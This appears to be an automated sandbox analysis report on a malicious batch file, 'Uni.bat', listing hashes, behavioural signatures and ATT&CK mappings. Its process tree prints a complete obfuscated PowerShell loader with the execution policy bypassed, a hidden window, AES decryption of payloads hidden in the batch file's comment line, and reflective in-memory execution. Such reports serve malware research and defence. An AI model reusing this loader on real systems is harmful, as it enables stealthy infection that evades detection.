5b50f8552e84e864a072b85c24a5aa8ceae9caf1f0ffec251e2240b43a26df2a

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-11-2024 10:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

13.7MB
MD5

577c262de7ca8fdfef3b12e8dd170ca5
SHA1

dd35b98c86bd9ac07ee362aeb99a83714511bd6d
SHA256

5b50f8552e84e864a072b85c24a5aa8ceae9caf1f0ffec251e2240b43a26df2a
SHA512

83c1033a62520ce5b32eadf68bfe48421986e5a15eedeb9dcfdf8ba1d1bb99ca863e5313ed6a3fd3a9fb433869e64094388376d6a141016bfd6035d9367ce2ab
SSDEEP

49152:fYSZV75wgeIWwiXe0+DRcnymKneX5wmiiU5Xnh22OhqkNu7KTnyl3547ih563zBg:d

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

Uni.bat.exe

pid	Process
2480	Uni.bat.exe

Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid	Process
1628	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Uni.bat.exe

pid	Process
2480	Uni.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Uni.bat.exe

description	pid	Process
Token: SeDebugPrivilege	2480	Uni.bat.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	Process	procid_target
PID 1628 wrote to memory of 2480	1628	cmd.exe	32
PID 1628 wrote to memory of 2480	1628	cmd.exe	32
PID 1628 wrote to memory of 2480	1628	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
  "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function lXUcN($NcmdG){ $ZNBwE=[System.Security.Cryptography.Aes]::Create(); $ZNBwE.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZNBwE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZNBwE.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HNqitIpHrhFARvFSHzYiIMCV8zsJdtJ13c58RfpaiVk='); $ZNBwE.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e9o/NMh8sZbD8255zk7X7A=='); $aQXue=$ZNBwE.CreateDecryptor(); $return_var=$aQXue.TransformFinalBlock($NcmdG, 0, $NcmdG.Length); $aQXue.Dispose(); $ZNBwE.Dispose(); $return_var;}function AFlSx($NcmdG){ $mcaON=New-Object System.IO.MemoryStream(,$NcmdG); $KYaKt=New-Object System.IO.MemoryStream; $mzipE=New-Object System.IO.Compression.GZipStream($mcaON, [IO.Compression.CompressionMode]::Decompress); $mzipE.CopyTo($KYaKt); $mzipE.Dispose(); $mcaON.Dispose(); $KYaKt.Dispose(); $KYaKt.ToArray();}function dYVlV($NcmdG,$Nedin){ $hWSci=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$NcmdG); $jhjWM=$hWSci.EntryPoint; $jhjWM.Invoke($null, $Nedin);}$ADJIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($lvGEz in $ADJIG) { if ($lvGEz.StartsWith(':: ')) { $Ecxmz=$lvGEz.Substring(3); break; }}$eSebZ=[string[]]$Ecxmz.Split('\');$HLWdG=AFlSx (lXUcN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eSebZ[0])));$hvZbu=AFlSx (lXUcN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eSebZ[1])));dYVlV $hvZbu (,[string[]] (''));dYVlV $HLWdG (,[string[]] (''));
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\Uni.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2480-5-0x000007FEF5E7E000-0x000007FEF5E7F000-memory.dmp

Filesize
4KB

Download
memory/2480-8-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-7-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-6-0x000000001B480000-0x000000001B762000-memory.dmp

Filesize
2.9MB

Download
memory/2480-10-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-9-0x00000000003A0000-0x00000000003A8000-memory.dmp

Filesize
32KB

Download
memory/2480-11-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-12-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download